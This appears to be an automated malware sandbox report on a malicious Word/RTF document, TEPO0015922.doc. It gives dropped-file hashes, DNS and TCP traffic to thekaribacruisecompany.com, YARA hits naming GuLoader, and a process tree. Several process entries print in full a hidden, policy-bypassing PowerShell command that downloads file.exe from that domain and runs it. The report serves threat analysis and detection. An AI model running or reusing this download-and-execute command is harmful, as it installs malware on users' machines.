                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                  Category:dropped
                  Size (bytes):80844
                  Entropy (8bit):6.256034406762346
                  Encrypted:false
                  SSDEEP:1536:YZJEZfE9Igi5zpy1dBpYb9CAW/NDvvhDfrQ4ZzgOlhwTMxQrvIJ7KJ6hxU/S9N2u:8GM9Tkzpy1d4b/W/JvhjrDDhwTsQrinB
                  MD5:C1B6BDA7931C1FE99589D7A9D0A0223E
                  SHA1:FA22FFD9FAE116EEEBC487B7F9DBC794FA180CBC
                  SHA-256:7E62946949E6982633ECF3C5A67121C6A101407E6DEB6C01D21A97344175ACC5
                  SHA-512:F0056CD015E7476A55A9B4F5C26D588332C1261D083762EFBAC875475ECB15E97521F2214088798D754F38D15BC080F046D10C68727BC533F6F51DA3A89BF087
                  Malicious:false
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75820
                  Entropy (8bit):4.595608514165927
                  Encrypted:false
                  SSDEEP:1536:6BlrBeHUW0BV7mgDoDiTEy1ZRkLuHFcWtiG:6DVUUhBIsTxuLcFcWUG
                  MD5:563A22B0870A170122E7E6B12B1DC71B
                  SHA1:978953365D04DFA73DBBDDC19C1F51F65B467F9D
                  SHA-256:F0800C56C7CC987302235997ACC52FBBDC90913FEED800F19C7E6986A10EC158
                  SHA-512:53BF553889B4F279F924DC6652D823C4A19045D0D59262D65F00C4A85D72435DEF8CF7D4BBE235E61E7F5DDDEC1E0A6CB2D2CA42AAA570FB9CAFC8E66C299379
                  Malicious:false
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                  Category:dropped
                  Size (bytes):11546
                  Entropy (8bit):5.130157501525605
                  Encrypted:false
                  SSDEEP:192:55sVeiuEzHQl+HjJWIZVVJ7niRk1RMBwugS:55sVebEzHQl5IZVVMRk1QSS
                  MD5:E2AFC893A72C3734DF31362E0962B153
                  SHA1:A44727652E6C84A1268945AA2F454F5424503411
                  SHA-256:CB7E80F94168D4C8F267255567F7232FAAAA3062D743C2375C3B7ECAD1F9718C
                  SHA-512:E13CBD0DE56639628266C18A34CB8F60052B588719F44F4EBC700D0D22BFF8AED74DD576A36737C131F4CD44E819AD074A50E7CF74994B313CE402F3E5349D2D
                  Malicious:false
                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f35\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\f36\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Verdana;}{\f264\froman\fcharset238\fprq2 Times New Roman CE;}{\f265\froman\fcharset204\fprq2 Times New Roman Cyr;}{\f267\froman\fcharset161\fprq2 Times New Roman Greek;}..{\f268\froman\fcharset162\fprq2 Times New Roman Tur;}{\f269\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f270\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f271\froman\fcharset186\fprq2 Times New Roman Baltic;}..{\f272\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\f614\fswiss\fcharset238\fprq2 Tahoma CE;}{\f615\fswiss\fcharset204\fprq2 Tahoma Cyr;}{\f617\fswiss\fcharset161\fprq2 Tahoma Greek;}{\f618\fswiss\fcharset162\fprq2 Tahoma Tur;}..{\f619\fbid
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289916
                  Entropy (8bit):7.020613805726218
                  Encrypted:false
                  SSDEEP:6144:zG2oSPADA0jxUN/4f3fW5Vfj0HyfC/nmZAgzoG:zGfDA0aNgPKVfj0UCeRR
                  MD5:73B129D4ADDF747733B355ABC2B1FEB3
                  SHA1:5721A84833ED7C601C569EC0AEA4D7C318F1D5EF
                  SHA-256:A906A2CD26285F34F1E66D51CEB807231DAC9F2E38E683EC210D5D8BF8DE155D
                  SHA-512:FBAC79148FD8E66DEEC4A5BC643F3750F3716093E23535D3E754FB634E05DD888FE63D33C8DFBEF64EFB5802DD3551659626F7FE2642CCBB5EAB493ECC49CE46
                  Malicious:false
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):42672
                  Entropy (8bit):5.9123418499114395
                  Encrypted:false
                  SSDEEP:768:bbGiXey9Kx/7yErMNHtxB3ptmL3zQYs+gAcckh/:bblh9KBNrMNHt33ptmL3TsVAW
                  MD5:77EF5801EA5C5BD331B83B813A741DDB
                  SHA1:71E010937EE6EBFB40C9F26EDE4C4F972B1DE5B6
                  SHA-256:D8CEDD5AF29E3539D7A48CEE62022D17F660627D32004B133F30D94F88432853
                  SHA-512:0FBD91DBD747BCA751F21821369929B6AA42C446DD1A1C1A1F794FE380E27F1A431DA1A794942DEF6FF1B43F791071BD5F1BF4259C32C401444014A318050C22
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):166947
                  Entropy (8bit):6.232611855964163
                  Encrypted:false
                  SSDEEP:3072:RROFUi/2PM0FQGxtMXG7aWTsHHAz9pjluR6xpRc8koGJG2R818X0BH8X1:mOvFQxWaTAz9qR6xNGJvz0BHM1
                  MD5:A06929ADEAD968870A2E6952CB7A0BD4
                  SHA1:CE8A3D0077CDB123ADECE62E4777BD0738E272EB
                  SHA-256:36B82AE3414F0941AED79604A17AB33994D3C0E868AA3DDAFD3B05F206BD4131
                  SHA-512:A6FD18D5996D92EF0A4C1BB3609BEF05F9F9E1044448E227B903292FE0B5773A89C8A02DE5CF2E1F560B176243B84BDF73353974FD66D710E1D36E31A5A10DFB
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):676320
                  Entropy (8bit):7.876330435838718
                  Encrypted:false
                  SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                  MD5:A1AFEF77EEC567ADB1076E8679AF207B
                  SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                  SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                  SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                  Malicious:true
                  Yara Hits:
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 6%
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                  Malicious:false
                  File type:Unicode text, UTF-8 text, with very long lines (4154), with CRLF line terminators
                  Entropy (8bit):3.2054554743535415
                  TrID:
                  • Rich Text Format (5005/1) 55.56%
                  • Rich Text Format (4004/1) 44.44%
                  File name:TEPO0015922.doc
                  File size:248144
                  MD5:364dc6c0e8a18b796aa535516d04cb53
                  SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
                  SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
                  SHA512:f2efd5cb38e6474c83268e7454e268eee06f342cb5b55575a94a3cd206bf7096a8a4ca72a89f88e35668d8d4e39243ef5c2f097f438dd7a7c09716c2d4c3a1c0
                  SSDEEP:1536:i1iO8Lcs5Kpn0Ws/zhiordTpM6DiJW3BPLN4rZVzFz76mAg5eeVhMDw5wfL8:i+5xdXGVzFtr5RDAw5wfY
                  TLSH:C7342EA4654F4872E208AC5DA4D47141AEB6FED330C598B123AFF031DF55AF2AEC019B
                  File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647
                  Icon Hash:e4eea2aaa4b4b4a4
                  Mar 18, 2023 05:35:09.611470938 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611557961 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611638069 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611654997 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.611707926 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.611742973 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.612143993 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.642641068 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.642848969 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.642885923 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.642918110 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643198013 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643323898 CET44349171149.102.154.62192.168.2.22
                  Mar 18, 2023 05:35:09.643379927 CET49171443192.168.2.22149.102.154.62
                  Mar 18, 2023 05:35:09.643404007 CET44349171149.102.154.62192.168.2.22
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Mar 18, 2023 05:35:09.025356054 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                  Mar 18, 2023 05:35:09.050968885 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                  Mar 18, 2023 05:35:11.517184019 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                  Mar 18, 2023 05:35:11.542437077 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Mar 18, 2023 05:35:09.025356054 CET | 192.168.2.22 | 8.8.8.8 | 0x478c | Standard query (0) | thekaribacruisecompany.com | A (IP address) | IN (0x0001) | false
                  Mar 18, 2023 05:35:11.517184019 CET | 192.168.2.22 | 8.8.8.8 | 0x78e0 | Standard query (0) | thekaribacruisecompany.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Mar 18, 2023 05:35:09.050968885 CET | 8.8.8.8 | 192.168.2.22 | 0x478c | No error (0) | thekaribacruisecompany.com |  | 149.102.154.62 | A (IP address) | IN (0x0001) | false
                  Mar 18, 2023 05:35:11.542437077 CET | 8.8.8.8 | 192.168.2.22 | 0x78e0 | No error (0) | thekaribacruisecompany.com |  | 149.102.154.62 | A (IP address) | IN (0x0001) | false
                  • thekaribacruisecompany.com

                  Target ID:0
                  Start time:05:34:16
                  Start date:18/03/2023
                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Imagebase:0x13f020000
                  File size:1423704 bytes
                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:4
                  Start time:05:34:20
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a870000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:6
                  Start time:05:34:20
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13fb60000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  Reputation:high

                  Target ID:7
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:9
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                  Antivirus matches:
                  • Detection: 6%, ReversingLabs
                  Reputation:low

                  Target ID:10
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:12
                  Start time:05:34:27
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13f540000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  Reputation:high

                  Target ID:13
                  Start time:05:34:38
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:15
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:16
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:18
                  Start time:05:34:39
                  Start date:18/03/2023
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                  Imagebase:0x13fa40000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                  Target ID:19
                  Start time:05:35:09
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:21
                  Start time:05:35:10
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:22
                  Start time:05:35:36
                  Start date:18/03/2023
                  Path:C:\Windows\System32\verclsid.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                  Imagebase:0xff520000
                  File size:11776 bytes
                  MD5 hash:3796AE13F680D9239210513EDA590E86
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:23
                  Start time:05:35:38
                  Start date:18/03/2023
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
                  Imagebase:0xffa70000
                  File size:193536 bytes
                  MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  No disassembly